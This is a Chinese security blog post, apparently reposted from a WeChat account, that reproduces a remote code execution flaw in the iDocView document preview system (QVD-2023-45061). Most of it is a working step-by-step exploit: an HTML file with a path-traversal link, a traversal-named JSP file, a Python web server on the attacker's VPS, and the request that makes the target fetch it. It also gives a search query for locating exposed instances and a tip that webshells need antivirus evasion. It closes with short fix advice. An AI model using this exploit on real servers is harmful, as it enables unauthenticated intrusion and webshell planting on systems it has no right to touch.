关注我们❤️,添加星标🌟,一起学安全! 作者:Locks_@Timeline Sec 本文字数:1042 阅读时长:2~3min 声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
I Doc View 在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统。主要为用户提供各种类型的文档文件的在线预览,而无需下载或安装相应的软件。
漏洞编号:QVD-2023-45061
I Doc View 在线文档预览系统存在远程代码执行漏洞,未经身份验证的远程攻击者利用 "/html/2word?url=" 接口可使服务器远程下载恶意文件,从而执行任意代码。
iDocView < 13.10.1_20231115
有条件的请移步这边
申请安装到您自己服务器的一个月免费试用版,请填写一下这个申请表:
https://wj.qq.com/s2/5983516/63c4/
语法查询:
title == "在线文档预览 - I Doc View"
第一步:最好在vps上创建一个新的文件夹复现
vim timelinesec.html构造html文件
<!DOCTYPE html>
<html lang="en">
<head>
<title>test</title>
</head>
<body>
<link href="/..\..\..\docview\locks.jsp">
</body>
</html>
构造恶意文件
vi '..\..\..\docview\locks.jsp'
<%out.print("Locks_");%>
在服务器开启python的http服务
python3.10 -m http.server 80
然后在 I Doc View 在线文档预览系统上访问路径 :
http://your-ip/html/2word?url=http://your-vps-ip/timelinesec.html
https://xxx.xx.xx.xx:84/html/2word?url=http://your-vps-ip/timelinesec.html
其他都是之前测试用的,不用在意 当两个请求都响应200时会下载一个word文件,表示利用成功
访问locks.jsp验证
tips:上传的马子需要是免杀后才能上传成功
上传的手法一样,多等一会,让子弹飞一会
漏洞分析:解析应用中的远程页面缓存功能没有对输入的URL进行充分的安全验证,通过构造特殊的URL,使得应用下载恶意文件
1、官方修复方案:厂商已禁用漏洞相关接口并升级软件版本到13.10.1_20231115,客户可升级到该版本解决漏洞,官网https://api.idocv.com已升级到最新版本。
2、临时修复方案:a.使用防护类设备对相关资产进行防护;b.如非必要,避免将资产暴露在互联网;如有需要可通过网络ACL策略限制访问来源,只允许特定IP进行访问;c.限制服务器主动访问外部陌生链接。
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!